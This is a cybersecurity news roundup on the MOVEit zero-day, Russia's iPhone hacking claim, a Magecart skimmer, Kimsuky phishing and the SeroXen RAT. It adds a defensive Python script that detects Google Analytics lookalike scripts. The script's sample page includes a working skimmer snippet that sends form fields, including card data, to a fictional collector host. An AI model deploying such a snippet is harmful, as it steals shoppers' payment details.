
MOVEit zero-day exploit and the U.S. iPhone hack accusation

June 5, 2023 by Dan Virgillito

MOVEit discloses a zero-day exploited for mass data theft, Russia accuses U.S. intelligence of hacking thousands of iPhones, and researchers uncover a Magecart-style web skimmer campaign. Catch all this and more in this week's edition of Cybersecurity Weekly.


1. Hackers mass exploited MOVEit Transfer zero-day to steal data

Hackers are actively exploiting a critical zero-day vulnerability, tracked as CVE-2023-34362, in the MOVEit Transfer managed file transfer product developed by Ipswitch (part of Progress Software). The flaw is a SQL injection in the MOVEit Transfer web application that can be escalated to remote code execution and used to steal data from the server; thousands of internet-exposed instances are affected, most of them in the U.S. Progress has released patched versions and, until they are applied, advises blocking HTTP and HTTPS traffic to the MOVEit Transfer environment and reviewing the server for unexpected files and newly created accounts. Although the attackers' end goal is not yet confirmed, organizations should prepare for extortion and publication of stolen data. The MOVEit Cloud service was also affected, and its customers are urged to investigate for potential data theft.


2. Russia says U.S. hacked thousands of iPhones to spy on diplomats

Russia has accused the U.S. of hacking thousands of iPhones belonging to Russian and foreign diplomats. The Federal Security Service (FSB) alleged that Apple worked closely with U.S. intelligence agencies, but provided no evidence for the claim. Separately, Kaspersky Lab reported a targeted attack on the iPhones of its senior employees that began with an iMessage carrying a malicious attachment and required no user interaction, leaving no visible message behind. A Kaspersky spokesman said Russian authorities believe the two sets of attacks are linked, but the company itself did not attribute the campaign to the United States.


3. New Magecart-style campaign targeting legitimate e-commerce sites

Cybersecurity researchers have discovered an ongoing Magecart-style web skimmer campaign targeting e-commerce websites. The attackers first compromise legitimate but vulnerable sites and repurpose them as hosting and command-and-control infrastructure for the skimmer, so the malicious script is served from a domain with a clean reputation. To evade inspection, the skimmer code is disguised as a popular third-party service such as Google Analytics, both in how the script is named and in how its loader looks. The compromised hosts then serve the skimmer to other victim sites, amplifying the campaign's reach. The campaign targets websites globally and puts the personal data and payment card details of thousands of shoppers at risk.
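The disguise-as-Google-Analytics trick is a good candidate for a static check on your own checkout pages. The script below is an added example written for this roundup, not code from the article or from the researchers who reported the campaign: it collects every script tag from a page and flags GA-named files served from a host that is not a Google analytics endpoint, and inline snippets that use GA symbols while referencing some other host. The trusted-host list, the lookalike filename patterns and the sample page (with fictional example.net and example.org hosts) are assumptions constructed for illustration.

```python
"""Added example for this roundup, not from the article or the researchers.

Flags <script> elements that imitate Google Analytics but load from, or
send data to, a host that is not a Google analytics endpoint. The trusted
host list, the lookalike patterns and the sample page are assumptions.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts that legitimately serve GA / Tag Manager code.
TRUSTED_ANALYTICS_HOSTS = {
    "www.google-analytics.com",
    "ssl.google-analytics.com",
    "www.googletagmanager.com",
}

# Script file names a skimmer copies so the tag looks like GA.
GA_LOOKALIKE_PATH = re.compile(r"(analytics\.js|gtag/js|gtm\.js|ga\.js)$", re.I)
# API symbols a skimmer copies so the inline code looks like GA.
GA_MARKERS = re.compile(r"\bga\b|\bgtag\b|GoogleAnalyticsObject|dataLayer")
# Any absolute URL inside inline code; the host is what we care about.
URL_IN_CODE = re.compile(r"https?://([A-Za-z0-9.-]+)")


class _ScriptCollector(HTMLParser):
    """Collects external script sources and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def find_suspicious_scripts(html):
    """Return (kind, host, detail) tuples for GA-lookalike scripts.

    kind is "external" for a GA-named file served from an untrusted host
    (including the page's own origin, reported as "(same-origin)") and
    "inline" for GA-looking code that references an untrusted host.
    """
    parser = _ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src in parser.external:
        url = urlparse(src)
        if GA_LOOKALIKE_PATH.search(url.path) and url.netloc.lower() not in TRUSTED_ANALYTICS_HOSTS:
            findings.append(("external", url.netloc.lower() or "(same-origin)", src))
    for body in parser.inline:
        if not GA_MARKERS.search(body):
            continue
        hosts = {h.lower() for h in URL_IN_CODE.findall(body)}
        rogue = sorted(h for h in hosts if h not in TRUSTED_ANALYTICS_HOSTS)
        if rogue:
            findings.append(("inline", ",".join(rogue), body.strip()[:60]))
    return findings


# Constructed sample page: one genuine GA tag, one lookalike loader hosted on
# another (fictional) compromised shop, and one inline fake that posts form
# fields to a fictional collector.
SAMPLE_PAGE = """
<html><head>
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-0000000-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date()); gtag('config', 'UA-0000000-1');
</script>
<script src="https://shop-one.example.net/media/analytics.js"></script>
<script>
  window.GoogleAnalyticsObject = 'ga';
  document.forms[0].addEventListener('submit', function () {
    new Image().src = 'https://stats.example.org/collect?d=' +
      btoa(JSON.stringify(Object.fromEntries(new FormData(document.forms[0]))));
  });
</script>
</head><body><form><input name="cc"></form></body></html>
"""

if __name__ == "__main__":
    for kind, host, detail in find_suspicious_scripts(SAMPLE_PAGE):
        print(f"{kind:8} {host:24} {detail}")
```

On the sample page the genuine Tag Manager tag passes, while the lookalike analytics.js from the other shop and the inline snippet that ships form fields to a third host are both reported. A check like this is only a first filter: a skimmer can be injected at runtime rather than in the static HTML, so pair it with a Content Security Policy that whitelists script sources and a report endpoint that tells you when something else tries to load.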


4. North Korean hackers impersonating journalists to collect intel

The North Korean state-sponsored group Kimsuky, also tracked as APT43, is running spear-phishing campaigns to collect intelligence. The group poses as journalists and academics, often opening with a benign request for comment or an interview before sending a malicious document or link. U.S. and South Korean government agencies have issued a joint advisory detailing the group's tradecraft. The advisory recommends strong passwords and multi-factor authentication as baseline mitigations, and cautions against enabling macros or opening attachments from unverified senders.


5. Hackers using stealthy SeroXen RAT to target gamers

Cybercriminals are increasingly targeting gamers with a fileless remote access trojan (RAT) called SeroXen, which is advertised on social media and hacker forums. The malware stitches together several open-source projects, including a modified Quasar RAT and the r77 rootkit, which is what makes it hard for antivirus products to detect. SeroXen is delivered through Discord channels or phishing emails as an obfuscated batch file that loads the final payload into memory, with the rootkit component hiding the malware's files and processes. It is sold for as little as $15 to $30 per month, and that combination of low price and low detection rate is why researchers are publicizing its capabilities.



Dan Virgillito

Dan Virgillito is a blogger and content strategist with experience in cyber security, social media and tech news. Visit his website or say hi on Twitter.